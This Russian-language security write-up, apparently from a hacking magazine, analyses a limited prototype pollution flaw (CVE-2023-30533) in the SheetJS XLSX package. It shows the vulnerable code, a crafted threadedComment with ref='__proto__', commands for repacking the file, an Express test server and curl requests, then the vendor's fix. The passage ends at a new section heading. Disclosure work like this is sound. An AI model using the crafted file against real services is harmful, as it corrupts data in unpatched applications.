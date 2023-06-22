Па­кет XLSX, выпущен­ный ком­пани­ей SheetJS, широко исполь­зует­ся раз­работ­чиками для вза­имо­дей­ствия с элек­трон­ными таб­лицами в фор­матах XLSX и XLSM, в том чис­ле при­меня­ется в кор­поратив­ных про­дук­тах. Ана­лизи­руя пакет, мы наш­ли нес­коль­ко уяз­вимос­тей. В этой статье я покажу, как они воз­никли и как их может экс­плу­ати­ровать зло­умыш­ленник.

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Да­вай вкрат­це пос­мотрим, как работа­ет SheetJS. Ког­да файл элек­трон­ной таб­лицы XLSX переда­ется фун­кции XLSX. readFile , про­исхо­дит сле­дующее:

Фун­кция про­веря­ет тип фай­ла, ана­лизи­руя пер­вые бай­ты заголов­ка. Если тип фай­ла рас­познан как ZIP-архив, про­цесс про­дол­жает­ся.

Файл архи­ва рас­паковы­вает­ся в память про­цес­са, что поз­воля­ет работать непос­редс­твен­но с XML-фай­лами, опи­сыва­ющи­ми струк­туру и дан­ные элек­трон­ной таб­лицы, а так­же с дру­гими ресур­сами, вклю­чая изоб­ражения и шриф­ты.

Пар­сер, встро­енный в биб­лиоте­ку, начина­ет раз­бор XML-тегов. Он ана­лизи­рует струк­туру фай­ла и извле­кает необ­ходимые дан­ные, такие как зна­чения яче­ек, фор­матиро­вание и дру­гие свой­ства таб­лицы.

По­лучен­ные дан­ные обыч­но пред­став­ляют­ся в виде удоб­ных струк­тур, таких как мас­сивы или объ­екты, что­бы их мож­но было лег­ко исполь­зовать в при­ложе­нии.

Limited Prototype Pollution

Описание недостатка

Уяз­вимость, свя­зан­ная с огра­ничен­ным заг­рязне­нием про­тоти­па (Limited Prototype Pollution), воз­ника­ет при обра­бот­ке ком­мента­риев внут­ри заг­ружен­ного докумен­та в фун­кции cmntcommon. В ней прис­ваивает­ся зна­чение объ­екта по клю­чу, который может кон­тро­лиро­вать­ся поль­зовате­лем.

else sheet [ comment . ref ] = cell ;

Для даль­нейше­го ана­лиза важ­но понимать, что такое comment. ref . Это зна­чение попада­ет в код из фай­ла threadedCommentXXX. xml (где XXX — номер докумен­та с ком­мента­риями). При­мер:

< threadedComment ref= "G7" dT= "2023-04-11T09: 41: 09. 71" personId= "{ 29DB960B-0822-594C-AB20-3D499FA339C7} " id= "{ 962D1EF3-37F7-FF40-983D-B0762466C0AF} " >

Обыч­но, ког­да файл соз­дает­ся в редак­торе элек­трон­ных таб­лиц, это не вызыва­ет проб­лем, так как адре­са яче­ек редак­тор сге­нери­рует авто­мати­чес­ки и это будут допус­тимые зна­чения.

Од­нако раз­работ­чики пакета XLSX не учли, что зло­умыш­ленник может вруч­ную соз­дать файл XLSX с про­изволь­ным содер­жимым и спе­циаль­но сфор­мировать адре­са яче­ек.

7z x normal. xlsx ; Вносим изменение в желаемые файлы 7z a NotNormal. zip . / \ [ Content_ Types \ ] . xml _ rels/ docProps/ xl mv NotNormal. zip NotNormal. xlsx

Для успешной экс­плу­ата­ции заг­рузим обыч­ный файл, но с таким threadedComment :

< threadedComment ref= "__proto__" dT= "2023-04-11T09: 41: 09. 71" personId= "{ 29DB960B-0822-594C-AB20-3D499FA339C7} " id= "{ 962D1EF3-37F7-FF40-983D-B0762466C0AF} " >

В таком слу­чае зна­чение comments. ref будет рав­но __proto__ , а cell будет содер­жать Object prototype .

Да­лее в коде фун­кции находим обра­щение к cell :

if ( ! cell . c ) cell . c = [] ;

Так как перемен­ная содер­жит prototype , то мас­сив запишет­ся в свой­ство c про­тоти­па объ­екта. Это при­ведет к тому, что при даль­нейших про­вер­ках все ком­мента­рии будут записы­вать­ся в один мас­сив, так как зна­чение cell. c будет всег­да опре­деле­но. Раз­работ­чикам сле­дова­ло исполь­зовать такую конс­трук­цию:

if ( ! cell . hasOwnProperty ( " c " ) ) cell . c = [] ;

Да­вай наб­роса­ем доказа­тель­ство кон­цепции:

const express = require ( ' express ' ) ; const fileUpload = require ( ' express-fileupload ' ) ; const app = express () ; const XLSX = require ( " xlsx " ) ; // Middleware для обработки файлов app . use ( fileUpload ()) ; // Получение POST-запроса c обработкой загруженного файла app . post ( ' / process ' , function ( req , res ) { if ( ! req . files || Object . keys ( req . files ) . length === 0 ) { return res . status ( 400 ) . send ( ' Не найдены загруженные файлы. ' ) ; } // Получение загруженного файла const uploadedFile = req . files . file ; let a = XLSX . read ( uploadedFile . data ) ; / * Далее может следовать любая обработка файла и т. д. */ res . send ( ' Файл успешно обработан. ' ) ; }) ; // Обработка GET-запроса c выдачей простого документа app . get ( ' / getSample ' , function ( req , res ) { var ws = XLSX . utils . aoa_to_sheet ([ [ " SheetJS " ] , [ 5433795 ], [ 123123 ]]) ; var wb = XLSX . utils . book_new () ; XLSX . utils . book_append_sheet ( wb , ws , ' Sheet1 ' ) ; const xlsxData = XLSX . write ( wb , { type : ' buffer ' }) ; // Возврат обработанного файла res . set ( ' Content-Type ' , ' application/ vnd. openxmlformats-officedocument. spreadsheetml. sheet ' ) ; res . set ( ' Content-Disposition ' , ' attachment; filename="processed_file. xlsx" ' ) ; res . send ( xlsxData ) ; }) ; // Запуск сервера app . listen ( 3000 , function ( ) { console . log ( ' Сервер запущен на порте 3000 ' ) ; }) ;

Этот скрипт при­нима­ет файл для обра­бот­ки на эндпо­инте / process , а при зап­росе / getSample воз­вра­щает при­мер обыч­ного фай­ла XLSX (который не содер­жит ком­мента­риев).

Сде­лаем нес­коль­ко зап­росов на сер­вер. Сна­чала обра­тим­ся к / getSample и откро­ем файл, что­бы прос­мотреть его содер­жимое:

$ curl http://localhost:3000

/getSample -o sample.xlsx

% Total % Received % Xferd Average Speed Time Time Time Current

Dload Upload Total Spent Left Speed

0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--100 22023 100 22023 0 0 1312k 0 --:--:-- --:--:-- --:--:-- 1955k

$ open sample.xlsx

А теперь выпол­ним серию зап­росов с нашим спе­циаль­ным фай­лом:

$ curl -X POST --form file=@

/Users/slonser/hack_xslsx/slon.xlsx http://localhost:3000/process Файл успешно обра­ботан.⏎

$ curl http://localhost:3000

/getSample -o sample.xlsx

% Total % Received % Xferd Average Speed Time Time Time Current

Dload Upload Total Spent Left Speed

0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--100 22023 100 22023 0 0 1312k 0 --:--:-- --:--:-- --:--:-- 1955k

$ open sample.xlsx

Реакция разработчиков

В вер­сии 0.19.3 пакета XLSX раз­работ­чики пос­тарались устра­нить этот баг. Они добави­ли такую про­вер­ку:

var r = decode_cell ( comment . ref ) ; if ( r . r < 0 || r . c < 0 ) return ;

Те­перь, если comment. ref содер­жит невалид­ное наз­вание ячей­ки таб­лицы, выпол­нение фун­кции прер­вется.

Ба­гу выдан иден­тифика­цион­ный номер CVE-2023-30533.

Модификация файлов person и threadedComment

Описание недостатка